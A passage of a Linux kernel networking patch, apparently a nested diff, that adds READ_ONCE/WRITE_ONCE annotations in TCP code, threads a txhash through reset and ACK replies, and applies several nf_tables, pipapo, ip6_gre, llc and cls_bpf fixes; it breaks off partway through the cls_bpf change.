+index e8734ffca85a8..c19b462662ad0 100644
+--- a/net/ipv4/inet_hashtables.c
++++ b/net/ipv4/inet_hashtables.c
+@@ -650,20 +650,8 @@ bool inet_ehash_insert(struct sock *sk, struct sock *osk, bool *found_dup_sk)
+ 	spin_lock(lock);
+ 	if (osk) {
+ 		WARN_ON_ONCE(sk->sk_hash != osk->sk_hash);
+-		ret = sk_hashed(osk);
+-		if (ret) {
+-			/* Before deleting the node, we insert a new one to make
+-			 * sure that the look-up-sk process would not miss either
+-			 * of them and that at least one node would exist in ehash
+-			 * table all the time. Otherwise there's a tiny chance
+-			 * that lookup process could find nothing in ehash table.
+-			 */
+-			__sk_nulls_add_node_tail_rcu(sk, list);
+-			sk_nulls_del_node_init_rcu(osk);
+-		}
+-		goto unlock;
+-	}
+-	if (found_dup_sk) {
++		ret = sk_nulls_del_node_init_rcu(osk);
++	} else if (found_dup_sk) {
+ 		*found_dup_sk = inet_ehash_lookup_by_sk(sk, list);
+ 		if (*found_dup_sk)
+ 			ret = false;
+@@ -672,7 +660,6 @@ bool inet_ehash_insert(struct sock *sk, struct sock *osk, bool *found_dup_sk)
+ 	if (ret)
+ 		__sk_nulls_add_node_rcu(sk, list);
+ 
+-unlock:
+ 	spin_unlock(lock);
+ 
+ 	return ret;
+diff --git a/net/ipv4/inet_timewait_sock.c b/net/ipv4/inet_timewait_sock.c
+index beed32fff4841..1d77d992e6e77 100644
+--- a/net/ipv4/inet_timewait_sock.c
++++ b/net/ipv4/inet_timewait_sock.c
+@@ -91,10 +91,10 @@ void inet_twsk_put(struct inet_timewait_sock *tw)
+ }
+ EXPORT_SYMBOL_GPL(inet_twsk_put);
+ 
+-static void inet_twsk_add_node_tail_rcu(struct inet_timewait_sock *tw,
+-					struct hlist_nulls_head *list)
++static void inet_twsk_add_node_rcu(struct inet_timewait_sock *tw,
++				   struct hlist_nulls_head *list)
+ {
+-	hlist_nulls_add_tail_rcu(&tw->tw_node, list);
++	hlist_nulls_add_head_rcu(&tw->tw_node, list);
+ }
+ 
+ static void inet_twsk_add_bind_node(struct inet_timewait_sock *tw,
+@@ -147,7 +147,7 @@ void inet_twsk_hashdance(struct inet_timewait_sock *tw, struct sock *sk,
+ 
+ 	spin_lock(lock);
+ 
+-	inet_twsk_add_node_tail_rcu(tw, &ehead->chain);
++	inet_twsk_add_node_rcu(tw, &ehead->chain);
+ 
+ 	/* Step 3: Remove SK from hash chain */
+ 	if (__sk_nulls_del_node_init_rcu(sk))
+diff --git a/net/ipv4/ip_output.c b/net/ipv4/ip_output.c
+index 2a07588265c70..7b4ab545c06e0 100644
+--- a/net/ipv4/ip_output.c
++++ b/net/ipv4/ip_output.c
+@@ -1691,7 +1691,7 @@ void ip_send_unicast_reply(struct sock *sk, struct sk_buff *skb,
+ 			   const struct ip_options *sopt,
+ 			   __be32 daddr, __be32 saddr,
+ 			   const struct ip_reply_arg *arg,
+-			   unsigned int len, u64 transmit_time)
++			   unsigned int len, u64 transmit_time, u32 txhash)
+ {
+ 	struct ip_options_data replyopts;
+ 	struct ipcm_cookie ipc;
+@@ -1754,6 +1754,8 @@ void ip_send_unicast_reply(struct sock *sk, struct sk_buff *skb,
+ 								arg->csum));
+ 		nskb->ip_summed = CHECKSUM_NONE;
+ 		nskb->mono_delivery_time = !!transmit_time;
++		if (txhash)
++			skb_set_hash(nskb, txhash, PKT_HASH_TYPE_L4);
+ 		ip_push_pending_frames(sk, &fl4);
+ 	}
+ out:
+diff --git a/net/ipv4/tcp.c b/net/ipv4/tcp.c
+index 0bd0be3c63d22..fab25d4f3a6f1 100644
+--- a/net/ipv4/tcp.c
++++ b/net/ipv4/tcp.c
+@@ -3397,7 +3397,7 @@ int tcp_sock_set_syncnt(struct sock *sk, int val)
+ 		return -EINVAL;
+ 
+ 	lock_sock(sk);
+-	inet_csk(sk)->icsk_syn_retries = val;
++	WRITE_ONCE(inet_csk(sk)->icsk_syn_retries, val);
+ 	release_sock(sk);
+ 	return 0;
+ }
+@@ -3406,7 +3406,7 @@ EXPORT_SYMBOL(tcp_sock_set_syncnt);
+ void tcp_sock_set_user_timeout(struct sock *sk, u32 val)
+ {
+ 	lock_sock(sk);
+-	inet_csk(sk)->icsk_user_timeout = val;
++	WRITE_ONCE(inet_csk(sk)->icsk_user_timeout, val);
+ 	release_sock(sk);
+ }
+ EXPORT_SYMBOL(tcp_sock_set_user_timeout);
+@@ -3418,7 +3418,8 @@ int tcp_sock_set_keepidle_locked(struct sock *sk, int val)
+ 	if (val < 1 || val > MAX_TCP_KEEPIDLE)
+ 		return -EINVAL;
+ 
+-	tp->keepalive_time = val * HZ;
++	/* Paired with WRITE_ONCE() in keepalive_time_when() */
++	WRITE_ONCE(tp->keepalive_time, val * HZ);
+ 	if (sock_flag(sk, SOCK_KEEPOPEN) &&
+ 	    !((1 << sk->sk_state) & (TCPF_CLOSE | TCPF_LISTEN))) {
+ 		u32 elapsed = keepalive_time_elapsed(tp);
+@@ -3450,7 +3451,7 @@ int tcp_sock_set_keepintvl(struct sock *sk, int val)
+ 		return -EINVAL;
+ 
+ 	lock_sock(sk);
+-	tcp_sk(sk)->keepalive_intvl = val * HZ;
++	WRITE_ONCE(tcp_sk(sk)->keepalive_intvl, val * HZ);
+ 	release_sock(sk);
+ 	return 0;
+ }
+@@ -3462,7 +3463,8 @@ int tcp_sock_set_keepcnt(struct sock *sk, int val)
+ 		return -EINVAL;
+ 
+ 	lock_sock(sk);
+-	tcp_sk(sk)->keepalive_probes = val;
++	/* Paired with READ_ONCE() in keepalive_probes() */
++	WRITE_ONCE(tcp_sk(sk)->keepalive_probes, val);
+ 	release_sock(sk);
+ 	return 0;
+ }
+@@ -3664,19 +3666,19 @@ int do_tcp_setsockopt(struct sock *sk, int level, int optname,
+ 		if (val < 1 || val > MAX_TCP_KEEPINTVL)
+ 			err = -EINVAL;
+ 		else
+-			tp->keepalive_intvl = val * HZ;
++			WRITE_ONCE(tp->keepalive_intvl, val * HZ);
+ 		break;
+ 	case TCP_KEEPCNT:
+ 		if (val < 1 || val > MAX_TCP_KEEPCNT)
+ 			err = -EINVAL;
+ 		else
+-			tp->keepalive_probes = val;
++			WRITE_ONCE(tp->keepalive_probes, val);
+ 		break;
+ 	case TCP_SYNCNT:
+ 		if (val < 1 || val > MAX_TCP_SYNCNT)
+ 			err = -EINVAL;
+ 		else
+-			icsk->icsk_syn_retries = val;
++			WRITE_ONCE(icsk->icsk_syn_retries, val);
+ 		break;
+ 
+ 	case TCP_SAVE_SYN:
+@@ -3689,18 +3691,18 @@ int do_tcp_setsockopt(struct sock *sk, int level, int optname,
+ 
+ 	case TCP_LINGER2:
+ 		if (val < 0)
+-			tp->linger2 = -1;
++			WRITE_ONCE(tp->linger2, -1);
+ 		else if (val > TCP_FIN_TIMEOUT_MAX / HZ)
+-			tp->linger2 = TCP_FIN_TIMEOUT_MAX;
++			WRITE_ONCE(tp->linger2, TCP_FIN_TIMEOUT_MAX);
+ 		else
+-			tp->linger2 = val * HZ;
++			WRITE_ONCE(tp->linger2, val * HZ);
+ 		break;
+ 
+ 	case TCP_DEFER_ACCEPT:
+ 		/* Translate value in seconds to number of retransmits */
+-		icsk->icsk_accept_queue.rskq_defer_accept =
+-			secs_to_retrans(val, TCP_TIMEOUT_INIT / HZ,
+-					TCP_RTO_MAX / HZ);
++		WRITE_ONCE(icsk->icsk_accept_queue.rskq_defer_accept,
++			   secs_to_retrans(val, TCP_TIMEOUT_INIT / HZ,
++					   TCP_RTO_MAX / HZ));
+ 		break;
+ 
+ 	case TCP_WINDOW_CLAMP:
+@@ -3724,7 +3726,7 @@ int do_tcp_setsockopt(struct sock *sk, int level, int optname,
+ 		if (val < 0)
+ 			err = -EINVAL;
+ 		else
+-			icsk->icsk_user_timeout = val;
++			WRITE_ONCE(icsk->icsk_user_timeout, val);
+ 		break;
+ 
+ 	case TCP_FASTOPEN:
+@@ -3762,13 +3764,13 @@ int do_tcp_setsockopt(struct sock *sk, int level, int optname,
+ 		if (!tp->repair)
+ 			err = -EPERM;
+ 		else
+-			tp->tsoffset = val - tcp_time_stamp_raw();
++			WRITE_ONCE(tp->tsoffset, val - tcp_time_stamp_raw());
+ 		break;
+ 	case TCP_REPAIR_WINDOW:
+ 		err = tcp_repair_set_window(tp, optval, optlen);
+ 		break;
+ 	case TCP_NOTSENT_LOWAT:
+-		tp->notsent_lowat = val;
++		WRITE_ONCE(tp->notsent_lowat, val);
+ 		sk->sk_write_space(sk);
+ 		break;
+ 	case TCP_INQ:
+@@ -3780,7 +3782,7 @@ int do_tcp_setsockopt(struct sock *sk, int level, int optname,
+ 	case TCP_TX_DELAY:
+ 		if (val)
+ 			tcp_enable_tx_delay();
+-		tp->tcp_tx_delay = val;
++		WRITE_ONCE(tp->tcp_tx_delay, val);
+ 		break;
+ 	default:
+ 		err = -ENOPROTOOPT;
+@@ -4093,17 +4095,18 @@ int do_tcp_getsockopt(struct sock *sk, int level,
+ 		val = keepalive_probes(tp);
+ 		break;
+ 	case TCP_SYNCNT:
+-		val = icsk->icsk_syn_retries ? :
++		val = READ_ONCE(icsk->icsk_syn_retries) ? :
+ 			READ_ONCE(net->ipv4.sysctl_tcp_syn_retries);
+ 		break;
+ 	case TCP_LINGER2:
+-		val = tp->linger2;
++		val = READ_ONCE(tp->linger2);
+ 		if (val >= 0)
+ 			val = (val ? : READ_ONCE(net->ipv4.sysctl_tcp_fin_timeout)) / HZ;
+ 		break;
+ 	case TCP_DEFER_ACCEPT:
+-		val = retrans_to_secs(icsk->icsk_accept_queue.rskq_defer_accept,
+-				      TCP_TIMEOUT_INIT / HZ, TCP_RTO_MAX / HZ);
++		val = READ_ONCE(icsk->icsk_accept_queue.rskq_defer_accept);
++		val = retrans_to_secs(val, TCP_TIMEOUT_INIT / HZ,
++				      TCP_RTO_MAX / HZ);
+ 		break;
+ 	case TCP_WINDOW_CLAMP:
+ 		val = tp->window_clamp;
+@@ -4240,11 +4243,11 @@ int do_tcp_getsockopt(struct sock *sk, int level,
+ 		break;
+ 
+ 	case TCP_USER_TIMEOUT:
+-		val = icsk->icsk_user_timeout;
++		val = READ_ONCE(icsk->icsk_user_timeout);
+ 		break;
+ 
+ 	case TCP_FASTOPEN:
+-		val = icsk->icsk_accept_queue.fastopenq.max_qlen;
++		val = READ_ONCE(icsk->icsk_accept_queue.fastopenq.max_qlen);
+ 		break;
+ 
+ 	case TCP_FASTOPEN_CONNECT:
+@@ -4256,14 +4259,14 @@ int do_tcp_getsockopt(struct sock *sk, int level,
+ 		break;
+ 
+ 	case TCP_TX_DELAY:
+-		val = tp->tcp_tx_delay;
++		val = READ_ONCE(tp->tcp_tx_delay);
+ 		break;
+ 
+ 	case TCP_TIMESTAMP:
+-		val = tcp_time_stamp_raw() + tp->tsoffset;
++		val = tcp_time_stamp_raw() + READ_ONCE(tp->tsoffset);
+ 		break;
+ 	case TCP_NOTSENT_LOWAT:
+-		val = tp->notsent_lowat;
++		val = READ_ONCE(tp->notsent_lowat);
+ 		break;
+ 	case TCP_INQ:
+ 		val = tp->recvmsg_inq;
+diff --git a/net/ipv4/tcp_fastopen.c b/net/ipv4/tcp_fastopen.c
+index 45cc7f1ca2961..85e4953f11821 100644
+--- a/net/ipv4/tcp_fastopen.c
++++ b/net/ipv4/tcp_fastopen.c
+@@ -296,6 +296,7 @@ static struct sock *tcp_fastopen_create_child(struct sock *sk,
+ static bool tcp_fastopen_queue_check(struct sock *sk)
+ {
+ 	struct fastopen_queue *fastopenq;
++	int max_qlen;
+ 
+ 	/* Make sure the listener has enabled fastopen, and we don't
+ 	 * exceed the max # of pending TFO requests allowed before trying
+@@ -308,10 +309,11 @@ static bool tcp_fastopen_queue_check(struct sock *sk)
+ 	 * temporarily vs a server not supporting Fast Open at all.
+ 	 */
+ 	fastopenq = &inet_csk(sk)->icsk_accept_queue.fastopenq;
+-	if (fastopenq->max_qlen == 0)
++	max_qlen = READ_ONCE(fastopenq->max_qlen);
++	if (max_qlen == 0)
+ 		return false;
+ 
+-	if (fastopenq->qlen >= fastopenq->max_qlen) {
++	if (fastopenq->qlen >= max_qlen) {
+ 		struct request_sock *req1;
+ 		spin_lock(&fastopenq->lock);
+ 		req1 = fastopenq->rskq_rst_head;
+diff --git a/net/ipv4/tcp_ipv4.c b/net/ipv4/tcp_ipv4.c
+index b37c1bcb15097..9a8d59e9303a0 100644
+--- a/net/ipv4/tcp_ipv4.c
++++ b/net/ipv4/tcp_ipv4.c
+@@ -307,8 +307,9 @@ int tcp_v4_connect(struct sock *sk, struct sockaddr *uaddr, int addr_len)
+ 						  inet->inet_daddr,
+ 						  inet->inet_sport,
+ 						  usin->sin_port));
+-		tp->tsoffset = secure_tcp_ts_off(net, inet->inet_saddr,
+-						 inet->inet_daddr);
++		WRITE_ONCE(tp->tsoffset,
++			   secure_tcp_ts_off(net, inet->inet_saddr,
++					     inet->inet_daddr));
+ 	}
+ 
+ 	inet->inet_id = get_random_u16();
+@@ -692,6 +693,7 @@ static void tcp_v4_send_reset(const struct sock *sk, struct sk_buff *skb)
+ 	u64 transmit_time = 0;
+ 	struct sock *ctl_sk;
+ 	struct net *net;
++	u32 txhash = 0;
+ 
+ 	/* Never send a reset in response to a reset. */
+ 	if (th->rst)
+@@ -829,6 +831,8 @@ static void tcp_v4_send_reset(const struct sock *sk, struct sk_buff *skb)
+ 				   inet_twsk(sk)->tw_priority : sk->sk_priority;
+ 		transmit_time = tcp_transmit_time(sk);
+ 		xfrm_sk_clone_policy(ctl_sk, sk);
++		txhash = (sk->sk_state == TCP_TIME_WAIT) ?
++			 inet_twsk(sk)->tw_txhash : sk->sk_txhash;
+ 	} else {
+ 		ctl_sk->sk_mark = 0;
+ 		ctl_sk->sk_priority = 0;
+@@ -837,7 +841,7 @@ static void tcp_v4_send_reset(const struct sock *sk, struct sk_buff *skb)
+ 			      skb, &TCP_SKB_CB(skb)->header.h4.opt,
+ 			      ip_hdr(skb)->saddr, ip_hdr(skb)->daddr,
+ 			      &arg, arg.iov[0].iov_len,
+-			      transmit_time);
++			      transmit_time, txhash);
+ 
+ 	xfrm_sk_free_policy(ctl_sk);
+ 	sock_net_set(ctl_sk, &init_net);
+@@ -859,7 +863,7 @@ static void tcp_v4_send_ack(const struct sock *sk,
+ 			    struct sk_buff *skb, u32 seq, u32 ack,
+ 			    u32 win, u32 tsval, u32 tsecr, int oif,
+ 			    struct tcp_md5sig_key *key,
+-			    int reply_flags, u8 tos)
++			    int reply_flags, u8 tos, u32 txhash)
+ {
+ 	const struct tcphdr *th = tcp_hdr(skb);
+ 	struct {
+@@ -935,7 +939,7 @@ static void tcp_v4_send_ack(const struct sock *sk,
+ 			      skb, &TCP_SKB_CB(skb)->header.h4.opt,
+ 			      ip_hdr(skb)->saddr, ip_hdr(skb)->daddr,
+ 			      &arg, arg.iov[0].iov_len,
+-			      transmit_time);
++			      transmit_time, txhash);
+ 
+ 	sock_net_set(ctl_sk, &init_net);
+ 	__TCP_INC_STATS(net, TCP_MIB_OUTSEGS);
+@@ -955,7 +959,8 @@ static void tcp_v4_timewait_ack(struct sock *sk, struct sk_buff *skb)
+ 			tw->tw_bound_dev_if,
+ 			tcp_twsk_md5_key(tcptw),
+ 			tw->tw_transparent ? IP_REPLY_ARG_NOSRCCHECK : 0,
+-			tw->tw_tos
++			tw->tw_tos,
++			tw->tw_txhash
+ 			);
+ 
+ 	inet_twsk_put(tw);
+@@ -984,11 +989,12 @@ static void tcp_v4_reqsk_send_ack(const struct sock *sk, struct sk_buff *skb,
+ 			tcp_rsk(req)->rcv_nxt,
+ 			req->rsk_rcv_wnd >> inet_rsk(req)->rcv_wscale,
+ 			tcp_time_stamp_raw() + tcp_rsk(req)->ts_off,
+-			req->ts_recent,
++			READ_ONCE(req->ts_recent),
+ 			0,
+ 			tcp_md5_do_lookup(sk, l3index, addr, AF_INET),
+ 			inet_rsk(req)->no_srccheck ? IP_REPLY_ARG_NOSRCCHECK : 0,
+-			ip_hdr(skb)->tos);
++			ip_hdr(skb)->tos,
++			READ_ONCE(tcp_rsk(req)->txhash));
+ }
+ 
+ /*
+@@ -2911,7 +2917,6 @@ static int bpf_iter_tcp_seq_show(struct seq_file *seq, void *v)
+ 	struct bpf_iter_meta meta;
+ 	struct bpf_prog *prog;
+ 	struct sock *sk = v;
+-	bool slow;
+ 	uid_t uid;
+ 	int ret;
+ 
+@@ -2919,7 +2924,7 @@ static int bpf_iter_tcp_seq_show(struct seq_file *seq, void *v)
+ 		return 0;
+ 
+ 	if (sk_fullsock(sk))
+-		slow = lock_sock_fast(sk);
++		lock_sock(sk);
+ 
+ 	if (unlikely(sk_unhashed(sk))) {
+ 		ret = SEQ_SKIP;
+@@ -2943,7 +2948,7 @@ static int bpf_iter_tcp_seq_show(struct seq_file *seq, void *v)
+ 
+ unlock:
+ 	if (sk_fullsock(sk))
+-		unlock_sock_fast(sk, slow);
++		release_sock(sk);
+ 	return ret;
+ 
+ }
+diff --git a/net/ipv4/tcp_minisocks.c b/net/ipv4/tcp_minisocks.c
+index 7f37e7da64671..42844d20da020 100644
+--- a/net/ipv4/tcp_minisocks.c
++++ b/net/ipv4/tcp_minisocks.c
+@@ -510,7 +510,7 @@ struct sock *tcp_create_openreq_child(const struct sock *sk,
+ 	newicsk->icsk_ack.lrcvtime = tcp_jiffies32;
+ 
+ 	newtp->lsndtime = tcp_jiffies32;
+-	newsk->sk_txhash = treq->txhash;
++	newsk->sk_txhash = READ_ONCE(treq->txhash);
+ 	newtp->total_retrans = req->num_retrans;
+ 
+ 	tcp_init_xmit_timers(newsk);
+@@ -537,7 +537,7 @@ struct sock *tcp_create_openreq_child(const struct sock *sk,
+ 	newtp->max_window = newtp->snd_wnd;
+ 
+ 	if (newtp->rx_opt.tstamp_ok) {
+-		newtp->rx_opt.ts_recent = req->ts_recent;
++		newtp->rx_opt.ts_recent = READ_ONCE(req->ts_recent);
+ 		newtp->rx_opt.ts_recent_stamp = ktime_get_seconds();
+ 		newtp->tcp_header_len = sizeof(struct tcphdr) + TCPOLEN_TSTAMP_ALIGNED;
+ 	} else {
+@@ -601,7 +601,7 @@ struct sock *tcp_check_req(struct sock *sk, struct sk_buff *skb,
+ 		tcp_parse_options(sock_net(sk), skb, &tmp_opt, 0, NULL);
+ 
+ 		if (tmp_opt.saw_tstamp) {
+-			tmp_opt.ts_recent = req->ts_recent;
++			tmp_opt.ts_recent = READ_ONCE(req->ts_recent);
+ 			if (tmp_opt.rcv_tsecr)
+ 				tmp_opt.rcv_tsecr -= tcp_rsk(req)->ts_off;
+ 			/* We do not store true stamp, but it is not required,
+@@ -740,8 +740,11 @@ struct sock *tcp_check_req(struct sock *sk, struct sk_buff *skb,
+ 
+ 	/* In sequence, PAWS is OK. */
+ 
++	/* TODO: We probably should defer ts_recent change once
++	 * we take ownership of @req.
++	 */
+ 	if (tmp_opt.saw_tstamp && !after(TCP_SKB_CB(skb)->seq, tcp_rsk(req)->rcv_nxt))
+-		req->ts_recent = tmp_opt.rcv_tsval;
++		WRITE_ONCE(req->ts_recent, tmp_opt.rcv_tsval);
+ 
+ 	if (TCP_SKB_CB(skb)->seq == tcp_rsk(req)->rcv_isn) {
+ 		/* Truncate SYN, it is out of window starting
+diff --git a/net/ipv4/tcp_output.c b/net/ipv4/tcp_output.c
+index 925594dbeb929..26bd039f9296f 100644
+--- a/net/ipv4/tcp_output.c
++++ b/net/ipv4/tcp_output.c
+@@ -876,7 +876,7 @@ static unsigned int tcp_synack_options(const struct sock *sk,
+ 	if (likely(ireq->tstamp_ok)) {
+ 		opts->options |= OPTION_TS;
+ 		opts->tsval = tcp_skb_timestamp(skb) + tcp_rsk(req)->ts_off;
+-		opts->tsecr = req->ts_recent;
++		opts->tsecr = READ_ONCE(req->ts_recent);
+ 		remaining -= TCPOLEN_TSTAMP_ALIGNED;
+ 	}
+ 	if (likely(ireq->sack_ok)) {
+@@ -3581,7 +3581,7 @@ struct sk_buff *tcp_make_synack(const struct sock *sk, struct dst_entry *dst,
+ 	rcu_read_lock();
+ 	md5 = tcp_rsk(req)->af_specific->req_md5_lookup(sk, req_to_sk(req));
+ #endif
+-	skb_set_hash(skb, tcp_rsk(req)->txhash, PKT_HASH_TYPE_L4);
++	skb_set_hash(skb, READ_ONCE(tcp_rsk(req)->txhash), PKT_HASH_TYPE_L4);
+ 	/* bpf program will be interested in the tcp_flags */
+ 	TCP_SKB_CB(skb)->tcp_flags = TCPHDR_SYN | TCPHDR_ACK;
+ 	tcp_header_size = tcp_synack_options(sk, req, mss, skb, &opts, md5,
+@@ -4124,7 +4124,7 @@ int tcp_rtx_synack(const struct sock *sk, struct request_sock *req)
+ 
+ 	/* Paired with WRITE_ONCE() in sock_setsockopt() */
+ 	if (READ_ONCE(sk->sk_txrehash) == SOCK_TXREHASH_ENABLED)
+-		tcp_rsk(req)->txhash = net_tx_rndhash();
++		WRITE_ONCE(tcp_rsk(req)->txhash, net_tx_rndhash());
+ 	res = af_ops->send_synack(sk, NULL, &fl, req, NULL, TCP_SYNACK_NORMAL,
+ 				  NULL);
+ 	if (!res) {
+diff --git a/net/ipv6/ip6_gre.c b/net/ipv6/ip6_gre.c
+index 216b40ccadae0..d3fba7d8dec4e 100644
+--- a/net/ipv6/ip6_gre.c
++++ b/net/ipv6/ip6_gre.c
+@@ -977,7 +977,8 @@ static netdev_tx_t ip6erspan_tunnel_xmit(struct sk_buff *skb,
+ 		goto tx_err;
+ 
+ 	if (skb->len > dev->mtu + dev->hard_header_len) {
+-		pskb_trim(skb, dev->mtu + dev->hard_header_len);
++		if (pskb_trim(skb, dev->mtu + dev->hard_header_len))
++			goto tx_err;
+ 		truncate = true;
+ 	}
+ 
+diff --git a/net/ipv6/tcp_ipv6.c b/net/ipv6/tcp_ipv6.c
+index 8d61efeab9c99..d9253aa764fae 100644
+--- a/net/ipv6/tcp_ipv6.c
++++ b/net/ipv6/tcp_ipv6.c
+@@ -1130,10 +1130,10 @@ static void tcp_v6_reqsk_send_ack(const struct sock *sk, struct sk_buff *skb,
+ 			tcp_rsk(req)->rcv_nxt,
+ 			req->rsk_rcv_wnd >> inet_rsk(req)->rcv_wscale,
+ 			tcp_time_stamp_raw() + tcp_rsk(req)->ts_off,
+-			req->ts_recent, sk->sk_bound_dev_if,
++			READ_ONCE(req->ts_recent), sk->sk_bound_dev_if,
+ 			tcp_v6_md5_do_lookup(sk, &ipv6_hdr(skb)->saddr, l3index),
+ 			ipv6_get_dsfield(ipv6_hdr(skb)), 0, sk->sk_priority,
+-			tcp_rsk(req)->txhash);
++			READ_ONCE(tcp_rsk(req)->txhash));
+ }
+ 
+ 
+diff --git a/net/llc/llc_input.c b/net/llc/llc_input.c
+index c309b72a58779..7cac441862e21 100644
+--- a/net/llc/llc_input.c
++++ b/net/llc/llc_input.c
+@@ -163,9 +163,6 @@ int llc_rcv(struct sk_buff *skb, struct net_device *dev,
+ 	void (*sta_handler)(struct sk_buff *skb);
+ 	void (*sap_handler)(struct llc_sap *sap, struct sk_buff *skb);
+ 
+-	if (!net_eq(dev_net(dev), &init_net))
+-		goto drop;
+-
+ 	/*
+ 	 * When the interface is in promisc. mode, drop all the crap that it
+ 	 * receives, do not try to analyse it.
+diff --git a/net/netfilter/nf_tables_api.c b/net/netfilter/nf_tables_api.c
+index 938cfa9a3adb6..ecde497368ec4 100644
+--- a/net/netfilter/nf_tables_api.c
++++ b/net/netfilter/nf_tables_api.c
+@@ -3500,8 +3500,6 @@ int nft_chain_validate(const struct nft_ctx *ctx, const struct nft_chain *chain)
+ 			if (err < 0)
+ 				return err;
+ 		}
+-
+-		cond_resched();
+ 	}
+ 
+ 	return 0;
+@@ -3525,6 +3523,8 @@ static int nft_table_validate(struct net *net, const struct nft_table *table)
+ 		err = nft_chain_validate(&ctx, chain);
+ 		if (err < 0)
+ 			return err;
++
++		cond_resched();
+ 	}
+ 
+ 	return 0;
+@@ -3892,6 +3892,8 @@ static int nf_tables_delrule(struct sk_buff *skb, const struct nfnl_info *info,
+ 		list_for_each_entry(chain, &table->chains, list) {
+ 			if (!nft_is_active_next(net, chain))
+ 				continue;
++			if (nft_chain_is_bound(chain))
++				continue;
+ 
+ 			ctx.chain = chain;
+ 			err = nft_delrule_by_chain(&ctx);
+@@ -10114,6 +10116,9 @@ static int nft_verdict_init(const struct nft_ctx *ctx, struct nft_data *data,
+ 
+ 	if (!tb[NFTA_VERDICT_CODE])
+ 		return -EINVAL;
++
++	/* zero padding hole for memcmp */
++	memset(data, 0, sizeof(*data));
+ 	data->verdict.code = ntohl(nla_get_be32(tb[NFTA_VERDICT_CODE]));
+ 
+ 	switch (data->verdict.code) {
+@@ -10395,6 +10400,9 @@ static void __nft_release_table(struct net *net, struct nft_table *table)
+ 	ctx.family = table->family;
+ 	ctx.table = table;
+ 	list_for_each_entry(chain, &table->chains, list) {
++		if (nft_chain_is_bound(chain))
++			continue;
++
+ 		ctx.chain = chain;
+ 		list_for_each_entry_safe(rule, nr, &chain->rules, list) {
+ 			list_del(&rule->list);
+diff --git a/net/netfilter/nft_set_pipapo.c b/net/netfilter/nft_set_pipapo.c
+index 0452ee586c1cc..a81829c10feab 100644
+--- a/net/netfilter/nft_set_pipapo.c
++++ b/net/netfilter/nft_set_pipapo.c
+@@ -1930,7 +1930,11 @@ static void nft_pipapo_remove(const struct net *net, const struct nft_set *set,
+ 		int i, start, rules_fx;
+ 
+ 		match_start = data;
+-		match_end = (const u8 *)nft_set_ext_key_end(&e->ext)->data;
++
++		if (nft_set_ext_exists(&e->ext, NFT_SET_EXT_KEY_END))
++			match_end = (const u8 *)nft_set_ext_key_end(&e->ext)->data;
++		else
++			match_end = data;
+ 
+ 		start = first_rule;
+ 		rules_fx = rules_f0;
+diff --git a/net/sched/cls_bpf.c b/net/sched/cls_bpf.c
+index bc317b3eac124..0320e11eb248b 100644
+--- a/net/sched/cls_bpf.c
++++ b/net/sched/cls_bpf.c
+@@ -404,56 +404,6 @@ static int cls_bpf_prog_from_efd(struct nlattr **tb, struct cls_bpf_prog *prog,
+ 	return 0;
+ }
+ 
+-static int cls_bpf_set_parms(struct net *net, struct tcf_proto *tp,
+-			     struct cls_bpf_prog *prog, unsigned long base,
+-			     struct nlattr **tb, struct nlattr *est, u32 flags,
+-			     struct netlink_ext_ack *extack)
+-{
+-	bool is_bpf, is_ebpf, have_exts = false;
+-	u32 gen_flags = 0;
+-	int ret;
+-
+-	is_bpf = tb[TCA_BPF_OPS_LEN] && tb[TCA_BPF_OPS];
+-	is_ebpf = tb[TCA_BPF_FD];
+-	if ((!is_bpf && !is_ebpf) || (is_bpf && is_ebpf))
+-		return -EINVAL;
+-
+-	ret = tcf_exts_validate(net, tp, tb, est, &prog->exts, flags,
+-				extack);
+-	if (ret < 0)
+-		return ret;
+-
+-	if (tb[TCA_BPF_FLAGS]) {
+-		u32 bpf_flags = nla_get_u32(tb[TCA_BPF_FLAGS]);
+-
+-		if (bpf_flags & ~TCA_BPF_FLAG_ACT_DIRECT)
+-			return -EINVAL;
+-
+-		have_exts = bpf_flags & TCA_BPF_FLAG_ACT_DIRECT;
+-	}
+-	if (tb[TCA_BPF_FLAGS_GEN]) {
+-		gen_flags = nla_get_u32(tb[TCA_BPF_FLAGS_GEN]);
+-		if (gen_flags & ~CLS_BPF_SUPPORTED_GEN_FLAGS ||
+-		    !tc_flags_valid(gen_flags))
+-			return -EINVAL;
+-	}
+-
+-	prog->exts_integrated = have_exts;
+-	prog->gen_flags = gen_flags;
+-
+-	ret = is_bpf ? cls_bpf_prog_from_ops(tb, prog) :
+-		       cls_bpf_prog_from_efd(tb, prog, gen_flags, tp);
+-	if (ret < 0)
+-		return ret;
+-
+-	if (tb[TCA_BPF_CLASSID]) {
+-		prog->res.classid = nla_get_u32(tb[TCA_BPF_CLASSID]);
+-		tcf_bind_filter(tp, &prog->res, base);
+-	}
+-
+-	return 0;
+-}
+-
+ static int cls_bpf_change(struct net *net, struct sk_buff *in_skb,
+ 			  struct tcf_proto *tp, unsigned long base,
+ 			  u32 handle, struct nlattr **tca,
+@@ -461,9 +411,12 @@ static int cls_bpf_change(struct net *net, struct sk_buff *in_skb,
+ 			  struct netlink_ext_ack *extack)
+ {
+ 	struct cls_bpf_head *head = rtnl_dereference(tp->root);
++	bool is_bpf, is_ebpf, have_exts = false;
+ 	struct cls_bpf_prog *oldprog = *arg;
+ 	struct nlattr *tb[TCA_BPF_MAX + 1];
++	bool bound_to_filter = false;
+ 	struct cls_bpf_prog *prog;
++	u32 gen_flags = 0;
+ 	int ret;
+ 
+ 	if (tca[TCA_OPTIONS] == NULL)
+@@ -502,11 +455,51 @@ static int cls_bpf_change(struct net *net, struct sk_buff *in_skb,
+ 		goto errout;
+ 	prog->handle = handle;
+ 
+-	ret = cls_bpf_set_parms(net, tp, prog, base, tb, tca[TCA_RATE], flags,
+-				extack);
++	is_bpf = tb[TCA_BPF_OPS_LEN] && tb[TCA_BPF_OPS];
++	is_ebpf = tb[TCA_BPF_FD];
++	if ((!is_bpf && !is_ebpf) || (is_bpf && is_ebpf)) {
++		ret = -EINVAL;
++		goto errout_idr;
++	}
++
++	ret = tcf_exts_validate(net, tp, tb, tca[TCA_RATE], &prog->exts,
++				flags, extack);
++	if (ret < 0)
++		goto errout_idr;
++
++	if (tb[TCA_BPF_FLAGS]) {
++		u32 bpf_flags = nla_get_u32(tb[TCA_BPF_FLAGS]);
++
++		if (bpf_flags & ~TCA_BPF_FLAG_ACT_DIRECT) {
++			ret = -EINVAL;
++			goto errout_idr;
++		}
++
++		have_exts = bpf_flags & TCA_BPF_FLAG_ACT_DIRECT;
++	}
++	if (tb[TCA_BPF_FLAGS_GEN]) {
